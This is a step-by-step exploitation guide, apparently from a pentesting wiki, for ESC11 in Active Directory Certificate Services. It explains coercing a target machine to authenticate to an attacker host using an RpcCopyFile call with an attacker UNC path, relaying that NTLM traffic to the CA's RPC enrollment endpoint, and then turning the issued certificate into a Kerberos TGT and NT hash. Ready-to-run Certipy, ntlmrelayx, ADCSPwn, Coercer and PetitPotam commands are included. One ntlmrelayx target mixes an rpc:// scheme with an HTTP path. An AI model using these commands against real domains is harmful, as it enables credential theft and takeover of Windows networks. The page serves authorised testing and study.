ESC11

TL;DR
ESC11 lets you obtain a certificate on behalf of an elevated computer/user account and use that certificate for client authentication using Kerberos.

A certificate authority can be vulnerable to ESC11 if the RPC enrollment interface allows NTLM authentication and does not enforce protections such as Extended Protection for Authentication (EPA). This allows an attacker to relay NTLM authentication to the certificate authority's RPC endpoint.

To exploit ESC11, we need a method of coercing a target computer to authenticate to an attacker controller computer. This is commonly done by abusing Remote Procedure Call (RPC) interfaces on a computer that would allow the attacker to trigger authentication.

An RPC function, RpcCopyFile, exists that takes three arguments: a SrcFile UNC path, a DstFile UNC path, and any flags you want to give it.

The RpcCopyFile function will simply attempt to copy the file given in the SrcFile path to the location in the DstFile path. However, if the SrcFile path leads to a different computer, the target computer you send the RPC function to will attempt to get the SrcFile from the other computer.

Putting it all together, if you want to coerce a target computer to authenticate to your attacker's computer, send them the following RPC function call:

RpcCopyFile(SrcFile="\\attacker_ip\share\file.txt", DstFile="C:\Temp\file.txt")

When the target computer attempts to authenticate to the attacker computer, we will then need to relay the authentication traffic from the target computer to the vulnerable RPC interface.

Once the certificate is obtained, we can use the certificate to obtain a Kerberos Ticket Granting Ticket (TGT) for the computer account using the PKINIT Kerberos extension.

Check out UnPAC The Hash to learn how we can obtain the account's NTLM hash using PKINIT.

Exploit

Set Up Relay On Attacker Computer

GitHub - ly4k/Certipy: Tool for Active Directory Certificate Services enumeration and abuseGitHub

Linux (Attacker)

certipy relay -target 'http://[CA FDQN]' -template [template]

GitHub - fortra/impacket: Impacket is a collection of Python classes for working with network protocols.GitHub

Linux (Attacker)

ntlmrelayx.py -t rpc://[CA FDQN]/certsrv/certfnsh.asp

If you are going to relay authentication from a Domain Controller, you must add --template DomainController to your command.

GitHub - bats3c/ADCSPwn: A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service.GitHub

Linux/Windows (Attacker)

ADCSPwn.exe --adcs [CA FQDN]

If successful, impacket-ntlmrelayx will give you the obtained certificate in base64 format

Coerce A Target Computer To Authenticate to the Attacker's Computer

GitHub - p0dalirius/Coercer: A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through 12 methods.GitHub

Linux (Attacker)

Coercer coerce -l [attacker ip] -t [target ip] -u [username] -p [password] -d [domain]

GitHub - topotam/PetitPotam: PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.GitHub

Linux (Attacker)

PetitPotam.py [listener] [target]

Note that there is the OG unauthenticated version of PetitPotam, and there is an authenticated version as well. The command above is leveraging the unauthenticated version.

Obtain The Target Computer Account's NT Hash

GitHub - ly4k/Certipy: Tool for Active Directory Certificate Services enumeration and abuseGitHub

Linux

certipy auth -pfx [.pfx output] -dc-ip [DC IP]

Takes the certificate in .pfx format

PreviousESC8 NextESC15

Last updated 12 days ago

hashtagExploit

hashtagSet Up Relay On Attacker Computer

hashtagCoerce A Target Computer To Authenticate to the Attacker's Computer

hashtagObtain The Target Computer Account's NT Hash

Exploit

Set Up Relay On Attacker Computer

Coerce A Target Computer To Authenticate to the Attacker's Computer

Obtain The Target Computer Account's NT Hash